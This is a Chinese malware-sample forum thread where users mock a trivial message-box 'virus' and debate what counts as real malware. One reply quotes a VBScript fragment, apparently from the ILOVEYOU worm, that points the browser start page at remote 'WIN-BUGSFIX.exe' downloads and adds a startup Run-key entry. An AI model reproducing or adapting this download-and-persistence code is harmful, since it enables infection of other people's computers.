一个360扫描不出的恶意小病毒

显示全部楼层 · 发表于 2020-7-21 10:30:24

对新人友情提醒：压缩包密码打不开，用默认infected

显示全部楼层 · 发表于 2020-7-21 10:49:36

本帖最后由川建国代理人于 2020-7-21 10:53 编辑

babaj 发表于 2020-7-21 10:45
记住，这玩意儿叫病毒

至少来一个echo或者rem吧

要能做到这样才算病毒吧。。。

<font size="1">if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub</font>

复制代码

显示全部楼层 · 发表于 2020-7-21 10:40:46

显示全部楼层 · 发表于 2020-7-21 10:43:08

do
msgbox
loop

这玩意儿也叫病毒？

火绒miss

显示全部楼层 · 发表于 2020-7-21 10:44:15

啊这。。。

复制代码

重启解决了

关掉进程也行

显示全部楼层 · 发表于 2020-7-21 10:45:55

川建国代理人发表于 2020-7-21 10:44
啊这。。。
重启解决了关掉进程也行

记住，这玩意儿叫病毒

显示全部楼层 · 发表于 2020-7-21 11:00:14

我下次再加一个添加到开机启动项得了

显示全部楼层 · 发表于 2020-7-21 11:00:45

babaj 发表于 2020-7-21 10:43
do
msgbox
loop这玩意儿也叫病毒？火绒miss

你可以试着运行一下

显示全部楼层 · 发表于 2020-7-21 11:02:07

矿工我发表于 2020-7-21 11:00
你可以试着运行一下

运行着就是循环出现报错窗口

显示全部楼层 · 发表于 2020-7-21 11:09:54

川建国代理人发表于 2020-7-21 10:49
至少来一个echo或者rem吧
要能做到这样才算病毒吧。。。

修改完文件后缀直接隔离都不让保存

[病毒样本] 一个360扫描不出的恶意小病毒